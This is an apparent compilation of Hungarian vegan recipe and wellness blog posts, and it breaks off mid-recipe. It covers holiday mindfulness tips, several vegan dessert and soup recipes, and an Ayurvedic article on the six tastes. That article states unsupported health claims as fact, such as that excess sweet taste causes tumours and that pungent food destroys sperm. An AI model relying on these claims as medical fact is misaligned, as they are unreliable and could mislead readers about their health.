Lélegezz A légzésed és az elméd mindig együtt megy. Ha feszült vagy figyeld meg, a légzésed felületesebb és gyorsabb, amikor nyugodt vagy a légzésed egyenletes és mélyebb. Ha bármikor feszültnek érzed magad, vagy pánikba esel, kezd el tudatosan lelassítani, elmélyíteni a légzésed. Ez azzonnal segít oldani a feszültségeket és megnyugtatja az elméd. A rekeszizom légzés megtapasztalásáról itt találsz bővebb információt. 13. Kerüld a neheztelést Ha van Benned bárki irányába rossz érzet, neheztelés azt engedd el. Ne menj bele személyes konfliktusokba, vitákba. Légy elfogadó, toleráns, próbáld megérteni a másik helyzetét is. Ha haragot örzöl a szívedben, akkor neked lesz rosszabb. Próbáld megérteni minden érted van és a fejlődésedet szolgálja és légy hálás minden tanításért amit kapsz. Az életben minden ami felénk érkezik a korábbi tetteink eredménye, akitől "elszenvedünk" egy egy dolgot, ő csak a postás és egy olyan csomagot hozott ki, amit mi adtunk fel magunknak korábban. 14. Légy hálás Gondolj hálával mindenkire és mindenre akik ebben az évben segítettek utadon. Én minden évben írok egy 100 elemű hála listát, kinek, illetve minek vagyok hálás. Hála listáról bővebben itt olvashatsz 15. Tervezd meg a jövődKiváló időszak az év vége arra, hogy átgondold az eltelt éved és megtervezd tudatosan a következő éved. Vedd sorra az egyes életterületeket egészség, család, barátok, munka, szabadidő, spiritualitás, emberi kapcsolatok, etc. Évértékeléshez és évindításhoz részletes tervezőt találsz az alábbi bejegyzésben. 16. Kapcsolódj Istennel (a Legfelsőbb erővel)Az ünnepek jó lehetőség arra is, hogy kapcsolatba kerülj Istennel. Ez egy lehetőség arra, hogy olvass szentírásokat, menj templomba, nézz vallási témájú filmeket, meditálj. A legjobb tanács pedig, hogy imádkozz. Az ima minden nehéz élethelyzeten átsegíti az embereket. Ha pedig nem tudsz imádkozni, akkor imádkozz azért Istenhez, hogy Te ugyan nem tudsz imádkozni, de kérd segítsen, hogy tudj imádkozni hozzá. Ne feldd, az hogyan töltöd az ünnepeket rajtad múlik. Ne ereszd bele magad a magány és bánat mocsarába. Ne gondold, hogy a Te életed a legrosszabb és főleg ne akard alkohollal vagy más szerekkel eltompítani a tudatodat. Tudatosan tegyél meg mindent azért, hogy ez egy Boldog Karácsony legyen. csinálj olyan dolgokat, amik boldoggá tesznek és élvezd az ünnepi hangulatot. Boldog Karácsonyt kívánok:)sok szeretettelKati
Narancsos grízpuding
Adj te is élményt karácsonyi ajándékba. :)
Ha szeretnél meglepni valakit egy főzőtanfolyammal ,
de még nem tudod a dátumot, kérj BIANCO ajándékutalványt.
Ez az időszak nekem az édes ízekről is szól. Egyfolytában kísérletezem, próbálom ki az új recepteket. A darapuding enyhe kényszerűség hatására született, még pedig azért, mert egyszercsak rengeteg lett itthon a búzadara, miután a múltkor mellényúltam a polcon, és liszt helyett véletlenül búzadarát vettem. Mivel a tejbegríz teljes egészében kiesik nálunk, maradnak az egyéb darás dolgok, amiből valljuk be, nincs túl sok. Azt hiszem, rövidesen sütök majd darapiskótát is.
Ez a darapuding finom illatos, gyönyörű színű, és izgalmas állagú is. Kicsit krémes, kicsit darabos, kicsit ruganyos is, olyan mint semmi más. :)
Persze hidegen eszik a rendesek, de a türelmetleneknek is meglesz a jutalma! ;) A darapuding még melegen is isteni!
A narancshéj pedig igazi téli hangulatot kölcsönöz neki, amiért rögtön aktuális kedvenc lett.
Ha még több karácsonyi édességre vágysz, gyere el a szaloncukor-készítő tanfolyamra !
Hozzávalók 2-3 adaghoz
- 500 ml tej
- 65 g cukor
- 5 g margarin
- 50 g búzadara
- 100 g tofu
- 20 g keményítő
- 2 csomag vaníliás cukor
- fél narancs héja
- késhegynyi kurkuma
- A tejben keverd el a cukrot, a búzadarát és a keményítőt. Öntsd hozzá a vaníliás cukrot, és reszeld bele a narancs héját is.
- Tedd fel a tűzre és főzd meg a búzadarát. Forrás után pár perccel kész is.
- Amíg melegszik, addig egy dl vízzel turixold össze a tofut. Használj botmixert, az szép krémesre dolgozza.
- Öntsd a darához a tofut is, és keverd el. Amíg még meleg, keverd el benne a margarint, bár ezt akár el is hagyhatod.
- A masszát öntsd formába, és hagyd megszilárdulni, mint a hagyományos főzött pudingot. Öntetnek én sima mélyhűtött epret turmixoltam össze, bár ez olyan egyszerű, hogy igazából alig merem leírni. :)
Jó étvágyat!
Elkészítési idő: 10 perc
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat!
Vegán Szaloncukor-készítő
Kezdő Vegán
Haladó vegán (Superfood)
Növényi tejtermékek
Görög vegán
Vegán MUST HAVE – a kötelező alapcsomag
Ez egy vegán recept volt. :)
Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba.
The post Narancsos grízpuding first appeared on Kertkonyha.
Laktató krémleves céklával, burgonyával és gyömbérrel – vegán recept
A hamar sötétedős és gyakran szürke és borongós őszi napokon nekem nagyon nagy szükségem van rá, hogy színeket csempésszek a hétköznapokba, így ez a krémleves feldobta az étkezést élénk árnyalataival. Egy szuper egészséges és laktató krémlevest készítettünk, amit hamar össze lehet dobni, ha valami melengető ételre vágynál. Hozzávalók: 2 cékla 2 édesburgonya 3 kicsi krumpli 1 nagy répa 2 ujjnyi gyömbér szeletelve 3 gerezd fokhagyma Fűszerek: római kömény fekete bors fokhagymagranulátum chilipor őrölt gyömbér szecsuáni bors só A céklát, krumplikat és répát meghámoztuk és kb. hasonló méretű kockákra szeleteltük. Vigyázz, hogy a cékla ne fogja össze mindened, mert eléggé hajlamos rá. :) Egy nagy lábasba mentek a hozzávalók a gyömbérrel kiegészítve. Nem kell aggódni, kb. egyszerre fognak megpuhulni a zöldségek. Leöntöttük annyi vízzel, hogy ellepje és puhulásig főztük, néha kevergetve és ellenőrizve hogyan áll. A felsorolt fűszereket használtuk hozzá, folyamatosan kóstolgatva, mikor harmonizált az ízlésünkkel. A fokhagymagerezdeket a folyamat végefelé adtuk hozzá, hogy intenzívebb maradjon az íze. Utolsó lépésként botmixerrel krémesre dolgoztuk a levesünket (mi a gyömbért turmixolás előtt kihalásztuk, de ízlés szerint benne lehet hagyni). Jó melegen tálaltuk. Tedd a kedveceim közé 0 The post Laktató krémleves céklával, burgonyával és gyömbérrel – vegán recept appeared first on VegaNinja.
Mákos szilvalekváros kalács (vegán)
Most amikor a szilvaszezon tart még, sokan főznek szilvalekvárt. Remek alkalom kipróbálni egy kis szilvalekváros-mákos kelt kalácsot. Persze egy próbasütést is végezhetünk karácsony előtt, és ha ízlett a családnak, akkor miért ne készítsünk ilyet akár karácsonyra is. Tej és tojásmentesen készült és nagyon etette magát. A szilvalekvárt különben még korábban erdélyi származású helybéli barátainktól kaptuk. Jó édes lekvár, így a mákhoz nem is kellett keverni semmi cukrot, csak megdarálni és a szilvalekvár tetejére szórni.
A recept
Hozzávalók:
- 20 dkg teljes kiőrlésű liszt
- 30 dkg fehér liszt
- 8 dkg xylit/nyírfa cukor/gyümölcs cukor (ki mivel édesít)
- 7 dkg folyékony kókuszzsír
- 4-5 dl növényi tej
- 2.8 dkg élesztő
- fél kávéskanál só
- pár csepp vanília kivonat
- narancs vagy citromhéj
- szilvalekvár
- darált mák
Elkészítés:
Fontos figyelnünk arra, hogy a konyhában, ahol készítjük a tészát, jó meleg legyen. Ne legyen huzat se.
Az élesztőt a kenyérsütő üstjébe morzsoljuk, és a 8 dkg édesítőszerből egy keveset beleteszünk, majd ráöntjük a felmelegített (kézmeleg) növényi tejet. Megvárjuk, míg az élesztő a tej felszínére kel vagy elegyedik. Ezután hozzáadjuk a többi tejet, cukrot, sót. Ezt követően a teljes kiőrlésű lisztet szórjuk bele, majd a kókuszzsírt, végül a fehér lisztet, vaníliát.
Dagasztó programot választunk. Kenyérsütő gép nélkül mi is összekeverhetjük - a tészta akkor jó, amikor a kézi dagasztás során már elválik az edény falától és hólyagos. Minél több hólyagok keletkeznek a tésztában, annál könnyebb lesz. Ha kézzel dolgozunk, akkor kilisztezett edénybe, konyharuhával letakarva meleg helyen kb. 1 órát pihentetjük, kelesztjük a tésztát. Mielőtt a konyharuhával letakarjuk, a tetejét is szórjuk meg egy kevés liszttel.
A megkelt tésztát 2-3 részre osztjuk és mindegyiket egymás után feldolgozzuk: enyhén lisztezett felületen óvatosan átgyúrjuk, majd kb 0,5 cm-es vastag téglalappá nyújtjuk. Megkenjük a szilvalekvárral majd rászórjuk a reszelt narancs/citromhéjjal elkevert darált mákot. Ha a szilvalekvár nem elég édes, akkor a mákot nem csak reszelt narancs vagy citromhéjjal keverjük el, de adunk hozzá édesítőt (eritritol, xylit vagy gyümölcscukor). Amikor a szilvalekvárral megkentük, majd megszórtuk a mákkal, a hosszabbik oldalától feltekerjük. Sütőpapírral bélelt tepsibe vagy formába tesszük. A tetejét megkenjük növényi tejjel (szerintem a zabtej szuper hozzá), majd előmelegített sütőben 180 fokon kb. 30-40 perc alatt készre sütjük. Ha a teteje nagyon sötétedne, barnulna, elképzelhető, hogy alufóliával érdemes letakarni a sütő idő felénél, hogy ne égjen meg.
Ajánlott megvárni míg kihűl, ugyanis akkor szebb szeleteket tudunk vágni belőle.
Sütőtökös muffin – egyszerű, vegán recept
Amint a nyár őszbe fordul, halaszthatatlan késztetést érzek rá, hogy valamilyen sütőtökös ételt készítsek. Hamarabb kezd sötétedni, jönnek a hűvösebb napok és ilyenkor jólesik valami finomsággal elvonulni, természetesen megfelelő mennyiségű gyertyával és pléddel felszerelkezve. Egyszerűen elkészíthető sütőtökös muffin receptet hoztam, ami nem igényel nehezen beszerezhető összetevőket és az ízesítésénél a kedvenc őszi fűszereiddel kreatívkodhatsz! Amire szükséged lesz (kb. 12 darab muffinhoz): 1 kisebb sütőtök, azaz 1 és fél csésze sütőtök püré 2 csésze liszt (én sima búzafinomlisztet használtam) 1 teáskanál szódabikarbóna 1 teáskanál sütőpor 1 csipet só 1/3 csésze olaj (olíva vagy kókuszolaj-lecserélhető édesítetlen almapürére) 1/3 csésze növényi tej (édesítetlen a legjobb hozzá, én most dm-es rizstejet használtam) 1-2 mokkáskanál vanília őrlemény 3 teáskanál fahéj 2/3 - 3/4 csésze cukor (én nádcukorral készítettem, mennyiség attól függ mennyire vagy édesszájú) opcionális fűszerek, amik illenek az őszi hangulatba: őrölt szerecsendió, őrölt gyömbér, kardamom, kurkuma, őrölt szegfűszeg, őrölt ánizs, őrölt szegfűbors vagy mézeskalács fűszerkeverék jól jön egy botmixer a sütőtök pürésítéséhez! A tököt megpucoltam és felkockáztam. A közepén található trutyit eltávolítottam, ha kedved tartja a magokat félreteheted és sütőpapíron kiterítve megpiríthatod a sütőben, de kevés olajon serpenyőben is működik a trükk - voilá, pirított tökmagod is van, amit elropogtathatsz. A felkockázott sütőtököt bő vízzel feltettem főni, amíg meg nem puhult. Botmixerrel összepürésítettem, kimértem a muffinokhoz elegendő mennyiséget. Ha több püréd lenne a maradékból akár krémlevest is készíthetsz, vagy megduplázhatod a muffin adagot. Egy közepes méretű edényben összekevertem a lisztet, cukrot, szódabikarbónát, sütőport, fahéjat és sót. Hozzáadtam a sütőtökpürét, olajat, vaníliát és a növényi tejet, majd jól elkevertem mindent. A fűszerezésnél nyugodtan elengedheted a fantáziád! Én szeretek őrölt szerecsendiót és őrölt gyömbért hozzáadni, de mézeskalács fűszerkeverékkel sem lehet mellélőni, ez általában tartalmazza a felsoroltakat. Töltsd meg a muffinformáidat (kb 12 darab jön ki belőle), 180 Celsius fokon süsd őket 20-25 percig, fogpiszkálóval ellenőrizheted, hogy a belseje is rendesen megsült-e. Gecse Réka Tedd a kedveceim közé 0 The post Sütőtökös muffin – egyszerű, vegán recept appeared first on VegaNinja.
Sült paradicsomos zöldségszósz
2021. szeptember 7. Vegavarázs
Két éve ötlöttem ki ezt a szószt, rögtön nagy sikert aratott. Azóta minden befőző szezonban készül. Paradicsomot magában is szoktam sütni, nagyon jó találmány, nem kell kevergetni, nem ég le. Arról nem is beszélve, hogy a paradicsom savas leve kisül, ezáltabb sokkal édesebb, teltebb, ízesebb lesz,...
Duplakókuszos golyó
DUUUUPLAAA?? Mitől dupla? Hát, attól, hogy kívül-belül kókuszos! Mert a kókuszgolyó mindenhogy jó, de duplán kókuszosan a legjobb!
Sőt! Ennél csak egy finomabb dolog van: a duplán kókuszos kókuszgolyó másnap! :D
Csinálj sokat belőle, ez annyira egy hálás nyári édesség, nem kell sem főzni, sem sütni, ráadásul a gyurmázás kész stresszoldó meditáció, és persze a gyerekek is a legnagyobb örömmel vesznek részt benne. :)
Hozzávalók egy lapostényérnyi golyóhoz:
- 150 g darált keksz
- 50 g porcukor
- 40 g kókuszreszelék (10 g a masszába, a maradék a hempergetéshez)
- 1 mk rum aroma
- 1 zacskó vaníliás cukor
- 100 ml növényi tej
- 1,5 ek kakaópor
- 50 g vegán vaj vagy margarin
- A massza száraz hozzávalóit jól keverd el egy tálban. A kókuszreszelékből vedd le a negyedét, és ezt is keverd hozzá.
- Gyúrd össze az egészet növényi tejjel és a margarinnal. A tejet finoman adagold, nehogy túl híg legyen a massza.
- Ezután formázz belőle golyókat, és hempergesd bele a maradék kókuszreszelékbe.
Jó étvágyat!
Elkészítési idő: 10 perc
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat!
Kezdő Vegán
Haladó vegán (Superfood)
Növényi tejtermékek
Görög vegán
Vegán MUST HAVE – a kötelező alapcsomag
Ez egy vegán recept volt. :)
Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba.
The post Duplakókuszos golyó first appeared on Kertkonyha.
Ízek hatása a szervezetedre, testi és lelki állapotodra
2021. június 26. Élj harmóniában
Az ájurvéda az ételeket különleges módon szemléli, mert akárcsak a dhósákat az ételeket is tulajdonságokkal írja le. A különböző tulajdonságok (jellemzők) hatással vannak a testi felépítésünkre, fizikai állapotunkra, általános elme állapotunkra és a tudatosságunkra. A rasa az ájurvédában az egyik legjelentősebb terápiás eszköz.A rasa szó a szanszkrit nyelvben több jelentéssel is bír - íz, egyfajta tapasztalat, lelkesedés, gyümölcslé, plazma (rasa dhatu), lényeg. Az ájurvéda 6 alapvető ízt különböztet meg, ezek mindegyik létfontosságú a testi és mentális egészségünk, belső harmóniánk szempontjából. Az ízek egymással keveredve sokféle kombinációban léteznek és végtelen változatosság által tudják élvezetessé tenni az életünket, étkezéseinket, tapasztalatainkat. Az ájurvéda tudományának alapját az elemek tana képezi. Az 5 fő elem éter, levegő, tűz, víz, föld. Egy adott étel mind az 5 elemet tartalmazza, de általában 2 elem jelentősebb mértékben fordul elő benne - ezek fogják leginkább meghatározni a tulajdonságait.Édes (Madhura) Föld és VízSavanyú (Amla) Föld és TűzSós (Lavana) Víz és TűzCsípős (Kata) Tűz és LevegőKeserű (Tikta) Levegő és FöldFanyar (Kashaja) Levegő és Föld Az egyes ízeket a nyelveden az alábbiak szerint érzékeled: Ízekhez kapcsolódó ájurvédikus fogalmak:Rasa - íz amit az étel elfogyasztásakor először tapasztalsz Virya - hőmérsékletre gyakorolt hatás, hevítő vagy hűsítő. Az íz után kezded érzékelni a szájban vagy akár az egész testben. Pl. chili után meleged lesz. Vipaka - emésztés utáni hatás a testre és a tudatra. Befolyásolja az izzadságot, ürüléket, vizeletet és táplálja a sejteket. Pl. chilis ételt eszel azonnal érzed a csípős ízt, utána megjelenik a hő érzet, majd másnap tapasztalhatsz rossz testszagot, égető érzést a vizeletben. Prabhava - ez egyfajt kiszámíthatatlan, hatása egy adott ételnek. Pl a ghee hűt, de mégis meggyújtja az emésztés tüzét, a méz édes de fűtő hatással rendelkezik.. A kiegyensúlyozott étrend, mind a 6 ízt tartalmazza és az egyéni alkat (prakriti) , aktuális állapot, egyensúlyhiány (vikriti) és az adott egyén környezeti tényezői (pl évszakok) határozzák meg, hogy milyen ízeket hogyan alkalmazzunk. ÉdesFöld+ Víz (jellemzők: olajos, hűsítő és nehéz)Virya: hűsít Vipaka: édesEgyensúlyba hozza Vata-t, Pitta-t és súlyosbítja Kapha-t.Rizs, tej, búza, kukorica, dinnye, datolya, füge, cékla és répa megfőzve, cukkini, mung dhal, vöröslencse, mandula, dió, tökmag, kókusz, ghee, minden édesítőszer kivétel a méz, vanília, édesgyökér.Növeli az életenergiát, erőt, felépítő, tápláló és hosszú életet ad. Élénkíti az érzékeket. Szép bőrt, hajat és hangot biztosít. Megszünteti a testben az égő érzeteket és a szomjúságot.Stabilitást ad és gyógyítja a soványságot. A legszattvikusabb íz, növeli a test ragyogását, erősíti az immunrendszert. Elősegíti szeretet, megosztás, együttérzés, öröm, boldogság érzését. Túlzott használat esetén növeli a kaphát, a zsírt, a hideget, a tompaságot, a nehézségérzetet a testben és elmében, a lustaságot. Elhízást, cukorbetegséget, abnormális izomnövekedést, ödémát, tumort okozhat. Hajlamossá tesz megfázásra, köhögésre. Növeli a ragaszkodást, birtoklást, kapzsiságot. Savanyú Föld+ Tűz (jellemzők: olajos, könnyű, folyékony, forró)Virya: fűt Vipaka: savanyúEgyensúlyba hozza Vata-t és súlyosbítja Pitta-t, Kapha-t.Citrom, grapefruit, lime, zöld szőlő, éretlen gyümölcsök, paradicsom, tészta, kenyér, sajt, tejföl, joghurt, ecet, erjesztett ételek, alkohol, fokhagyma. A savanykás íz étvágyat csinál, segíti az emésztést, javítja az anyagcserét. Energetizálja, frissíti a testet és táplálja a szívet. Nedvesíti a szájat, folyadékokat tart a szövetekben, megszünteti a szárazságot. Segíti az epeáramlást és a máj stagnálását is megszünteti. Felébreszti az elmét. Elősegíti a megértést, megbecsülést.Túlzott használat esetén érzékenységet hoz létre a fogakban, szemekben. Szárítja a nyálkahártyákat, torlódásokat, ödémát, viszketést, túlzott szomjat és emésztési gondokat savasodást, gyomorégést és fekélyt is okozhat. Toxikus a vér számára és bőrelváltozásokat okoz, mintpattanások, pikkelysömör, ekcéma. A forró tulajdonsága miatt savasodik a ph a testben és égő érzést okozhat mellkasban, torokban, szívben, epében és a húgyutakban. Növeli a kritikát, féltékenységet, izgatottságot, gyűlöletet, önzést, hiperaktivitást. SósTűz + Víz (jellemzők: olajos, nehéz, meleg)Virya: fűtVipaka: édesEgyensúlyba hozza Vata-t súlyosbítja Kapha-t, Pitta-t.Kősó, tengeri só, szójaszósz, tamari, zeller, tengeri moszat.Energetizáló, tápláló, erősítő. Hashajtó hatású és oldja a görcsöket a bélrendszerben. Fokozza a nyálkaképződést, javítja az emésztést és a felszívódást. Elősegíti a növekedést, támogatja az izomerőt, nedvesíti a testet, fenntartja a testben az elektrolit egyensúlyt. Földelő, segít az idegrendszert megnyugtatni. Serkentő hatású, megakadályozza a testi és szellemi merevséget, szomorúságot, tompaságot, kreativitás hiányát. Elősegíti a bátorságot, lelkesedést, érdeklődést, magabiztosságot. Túlzott használat esetén a vért besűríti ezzel magas vérnyomást okozhat. Növelheti az ödémát és vízvisszatartást. Savasítja a testet bőrproblémákat, kiütéseket, fekélyeket és kellemetlen hőérzetet hozhat létre. A túlzott sóbevitel ájulást, kopaszodást és ráncosodást is okozhat. Növeli a ragaszkodást, függőségeket, birtoklást, kapzsiságot, ingerlékenységet. CsípősTűz + Levegő (jellemzők: forró, száraz, könnyű, éles)Virya: fűtVipaka: csípősEgyensúlyba hozza Kapha-t és súlyosbítja Vata-t, Pitta-t.Chili, feketebors, fokhagyma, hagyma, retek, hajdina, mustármag, gyömbér, asafoetida.Felmelegíti a testet, tisztítja a szájat, érzékeket, lángra lobbantja az emésztést tüzét (agnit), javítja a felszívódást. A test üregeket is tisztítja - pl arcüreg, orrüreg.A csípős íz nagyon fontos a kapha felesleg eltávolításában, mert felmelegíti és szárítja a nyálkát, zsírt és felszámolja a torlódásokat. Energetikailag serkent, élénkít, növeli a keringést, értágitó hatása van, ösztönzi az izzadást, tisztítja az egész testet. Elpusztítja a baktériumokat és parazitákat is. Elősegíti a lelkesedést, kíváncsiságot, tisztaságot, vitalitást, koncentrációt. Túlzott használat esetén izgatottságot, túlzott aktivitást hozhat létre és idegrendszeri egyensúlyhiányt. Az általa keltett túlzott hő a testben égő érzéseket, bőrpírt, szomjúságot, fáradtságot, emésztési nehézségeket, csuklást, bélgyulladást okozhat. Ha pitta-t emeli okozhat gyomorégést, hányást és hasmenést. Ha vata-t emeli, okozhat remegést, álmatlanságot és fájdalmakat az izmokban. A csípős íz túlzásbavitele elpusztítja spermát és a petesejtet és szexuális gyengeséget okoz mindkét nem számára. Növeli az agressziót, ingerlékenységet, haragot, dühöt, irigységet, versengést. KeserűLevegő + Éter (jellemzők: hideg, könnyű, száraz)Virya: hűsítVipaka: csípősEgyensúlyba hozza Pitta-t , Kapha-t és súlyosbítja Vata-t.Leveles zöldségek pl. káposztafélék, padlizsán, szezámmag, étcsokoládé, kávé, görögszéna, kurkuma, karela.Mélyen tisztítja a testet, megszabadítja az ama-tól és a zsírtól és elpusztítja a baktériumokat. Enyhíti a szomjat és ösztönzi az egészséges étvágyat. Segít tisztítani a testben a vért, a hőt, a májat, beleket. Megszünteti az égő érzést, viszketést, bőrproblémákat és csökkenti a lázat. Elvezeti a testből a felesleges nedvességet. Stimulálja az idegrendszert, a bőr és az izmok tónusát. Elősegíti az epe és a máj működését. Száraz, könnyű tulajdonságával segíti az emésztést, csökkenti a zsírt. Elősegíti az egészséges elszakadást a világi dolgoktól, az önmegfigyelést, világosságot. Túlzott használat esetén szárazságot okoz a szájban, szövetekben és az egész testben. Kiszárítja az ojas-t, a szövetek leépülését, soványságot, gyengeséget okozhat. Kiváltó oka lehet szédülésnek. Növeli a cinizmust, elutasítást, unalmat, elszigeteltséget, magányt. Fanyar (összehúzó)Levegő + Föld - ebből eredően hideg, nehéz, szárazVirya: hűsítVipaka: csípősEgyensúlyba hozza Pitta-t , Kapha-t és súlyosbítja Vata-t.Éretlen banán, gránátalma, okra, borsó, zöldbab, karfiol, legtöbb nyers zöldség, babfélék, oregánó, petrezselyem, rozmaring, kurkuma, sáfrány. Hűsíti és szárítja a testet és az elmét. Összehúzó hatású, megállítja a vérzékenységet. Szárazságot okoz a szájban, csökkenti az izzadást. Elősegíti az egységesség érzését és a stabilitást.Túlzott használat esetén növeli a vata-t. Szárazságot okozhat a szájban és csuklást is. Nehezíti az emésztést, étvágytalanságot, székrekedést, erős szomjúságot, fogyást és emésztési problémákat okozhat. Létrehozhat elakadásokat a hangban, keringésben.Izom és ízületi problémák gyökere is lehet a túl sok fanyar íz (pl arcidegzsába) . Stagnálást okozhat a vérben, nyirokban és lassítja a keringést. Gyengíti a spermát. Növeli félelmet, szorongást, idegességet, szomorúságot, merevséget, neheztelést. Az íz egyfajta tapasztalat, érdemes gazdagítani a saját tapasztalataidat, élvezni az ízek sokszínűségét, figyelni a hatásukat. Ha megismered az ízekkel kapcsolatos ájurvédikus tudást, az ízekkel befolyásolhatod a fizikális és mentális állapotodat. Figyelj rá, hogy egy adott napon, minden íz előforduljon a táplálkozásodban és vedd figyelembe az egyéni alkatodat is. Ez segít abban, hogy az étkezésed nem csak változatos, de egészséges is lesz.Ízekben, élményekben gazdag életet kívánok:) szeretettelKati
Szeretnék-e külföldi jógatáborokat szervezni?
2021. május 24. Élj harmóniában
Kaptam ma egy kérdést egy csoportban... "Te nem akarsz szervezni külföldi jógatáborokat is? " Gondoltam a válaszomat megosztom veletek... "Nem tervezzük, mi kicsit már környezettudatosan élünk, legalább is igyekszünk Nagyon komoly környezeti terhelés utazgatni külföldre, főleg csoportosan (mi magunk se járunk) és az élmény megéléséhez szerencsére nem számít hol vagy... ha valaki élvezi a szép tájat, napsütést és jó a társaság tud pihenni, akkor nem kap kevesebbet ebből az élményből pl. a Pilisben, mintha a világ másik táján élvezi a szép tájat és a napsütést. Ha valaki eszik egy jót abból amit a piacon vásárolt és magának főzött és jól lakik, ízlik neki az étel, nem kap kevesebb élményt, mintha sok sok ezer forintból méregdrága étteremben evett volna. Ha valami egy embernek ad egy jó élményt, attól hogy drágább vagy messzebb van, nem lesz nagyobb az élmény. Ma sajnos sokan attól szenvednek, hogy mindig azt hiszik ha ezt vagy azt megvehetik, ide oda elmehetnek akkor boldogabbak lesznek, nagyobb élményekben lehet részük. Volt egy boldogságkutatás - valamleyik amerikai egyetemen - ahol kihozták Banglades nyomornegyedeiben az emberek boldogabbak, mint New York elit negyedeiben. Eleve egy utazásra mindenki elviszi magával a saját elméjét, ha az elme tud békést lenni, akkor a Pilisben is tud és lesz boldogságérzet, szuper élmény érzet és feltöltődés. Ha meg nem, akkor a világ legdrágább utazása sem hoz békét és feltöltődést, marad az elégedetlenség, a másra vágyás, a következő út tervezgetése. a remény, hogy ha majd egy jobb, menőbb utazásra mehet talán jobb lesz... Plusz egy repülőút nagyon kimeríti a szervezetet, csökkenti a pránát " Összességében minden utazás csökkenti a pránát, az életerőt és megzavarja a Vata-t. Nem véletlen, hogy utazás alatt nem sok mindent csinálsz, de fáradtnak érzed magad utána. Valamint utazáskor a vata renellenességeket is sokan tapasztalják magukon - idegesség, szorongás, alvás zavar, emésztési zavarok, székrekedés, bőrszárazság, puffadás. Ha pl Kapha alkatod van, terészetesen elképzelhető, hogy semmilyen tüneted nem lesz:) Figyeld meg magad.a testérzeteket, a légzésedet, az energiaszintedet utazás előtt, közben és után. Nem árt tudatosnak lenni arról és okosan mérlegelni, hogy egy utazásnál mennyi a haszon és mennyi a veszteség. Ha a távoli helyre nyaralás eredménye kimerültség, feszültség, emésztési zavar, etc. akkor lehet érdemesebb egy olyan utat választani, ami kevésbé veszi igénybe a szervezeted. Természetben lenni mindig a lehető legjobb, mert pránával tölt fel. Ha teheted élvezd a friss levegőt, a csendet, a szép panorámát...menj erdőbe, kirándulni, víz mellé és kerüld egy a zsúfolt, rossz levegőjű, zajos nagyvárosokat. Jó nyaralást kívánok:) szeretettel Kati
Somlói galuska vegán módra
Aki igazán ismer, tudja, hogy a somlói galuska a kedvenc sütim (ha lehet egyátalán sütinek hívni). Mikor még nem vegánul étkeztünk, egyik télen meglehetősen sok somlói galuskát készítettem. Az volt az ajándékom a család tagjainak karácsonyra. Több tálcával készítettem akkor. Karácsony elmúltával pedig szilveszterre is elkészítettem a baráti társaságnak, akikkel együtt töltöttük az évzáró idejét. Most eljött az ideje, hogy a blogon is megosszam a vegán somlói galuska receptjét. Szerintem szuper, hogy nem kell hozzá tojás, sem tej, ízben mégsem marad el a cukrászdákban készített somlóitól. Amúgy annyi módon rakják össze a somlóikat, hogy ahány ház annyi szokás, tapasztalatom szerint. Én is már több módon csináltam. Most egy egyszerűbb verzió receptjét hoztam, ahol nem kell külön megsütni a 3 különböző piskótát. Tuti sikert kínál az ünnepi asztalon, legyen az húsvét vagy karácsony, esküvő, vagy születésnap. Magyarország egyik legkedveltebb édességét vegán módon is elkészíthetjük.
Ha érdekel, honnan ered a somlói galuska, akkor csak a múlt század közepéig kell visszatekinteni. Az 1950-es évek végén a Gundel étterem legendás főpincére, Gollerits Károly újításként adta be a somlói galuskát. Gollerits 16 évig volt a Gundel étterem vezető főpincére, a megvalósítás azonban Szőcs József Béla cukrászmester érdeme volt, aki a Gerbeaud cukrászdában töltött tanulóévek után került a Gundelbe. Az új desszerttel az 1958-as brüsszeli világkiállításon nagy sikerrel és szakmai díj elnyerésével szerepelt. A nevet is ő adta a süteménynek, méghozzá a fóti Somlyó nevű 288 méter magas dombról, amely a Gödöllői-dombság legnyugatibb nyúlványa, amelynek lábánál évtizedek óta élt a közeli Kisalag városrészben, ahol később a saját cukrászdája is működött. Somlói azért lett a neve, mert Brüsszelben valaki véletlenül lehagyta az ipszilont a díjnyertes somlyói-galuska desszert nevéből, így végül somlói-galuska névvel került a gasztronómiába. (Forrás Wikipédia)
A piskóta receptje
Hozzávalók:
- 3x17 dkg fehér liszt
- 3x8 dkg teljes kiőrlésű liszt
- 3x3-4 evőkanál nyírfacukor
- 3x14 evőkanál növényi tej
- 3x2 evőkanál étolaj
- 3x1 kisebb citrom vagy 1 fél narancs kifacsart leve
- 3x1/2 teáskanál szódabikarbóna
Továbbá:
- 2-3 evőkanál kakaópor (vagy karobpor)
- 1-2 dl örölt dió
- kurkuma és vanília
Elkészítés:
A somlói tésztájának az elkészítése történhet úgy, hogy sütünk 3 különböző piskótát (egy kakaós, egy diós és egy vaníliás) piskótát külön külön, vagy - ahogy legutóbb én csináltam - rövidebb idő alatt a három külön kikevert tésztát egymásra folyatva egybe sütjük meg.
A piskóta vagy piskóták elkészítése:
Fogunk egy tálat, összekeverjük benne először a száraz hozzávalókat, majd hozzákanalazzuk a növényi tejet és étolajat és hozzáadjuk a citrom/narancs levét. Csomómentesre keverjük majd egy sütőpapírral bélelt tepsibe öntjük. Előmelegített sütőben kb. 20 percig sütjük. Tűpróbával ellenőrizzük, ha beleszúrjuk a piskóta közepébe, és nem ragad rá, megsült a piskótánk.
Csoki puding:
Hozzávalók:
- 10 dkg kakaópor vagy karobport
- 12 dkg étkezési keményítő (kukorica)
- 5 dl növényi tej (zab vagy szója tej is megteszi)
- 10 dkg édesítő szer mint például erithritol, gyümölcs cukor vagy agavé- vagy juharszirup
- 1 teáskanál vanília-kivonat
Elkészítés:
A tejből kb. 3 dl felteszünk forrni. Közben a kakaóport és az étkezési keményítőt egy nagyobb pohárban vagy mérőedényben a hideg tejjel csomómentesre keverjük. Amikor már szinte forr a növényi tej, folyamatosan keveréssel hozzáadjuk a kikevert keményítős tejet és az édesítő szert. Addig kevergetjük és forraljuk, amíg puding állagúra besűrűsödik.
Vanília puding:
Hozzávalók:
- 12 dkg étkezési keményítő
- 5 dl növényi tej (zab vagy szója tej is megteszi)
- 10 dkg édesítő szer mint például erithritol, gyümölcs cukor vagy agavé- vagy juharszirup
- 2-3 teáskanál vanília-kivonat vagy vanília arom
- csipetnyi kurkuma
Elkészítés:
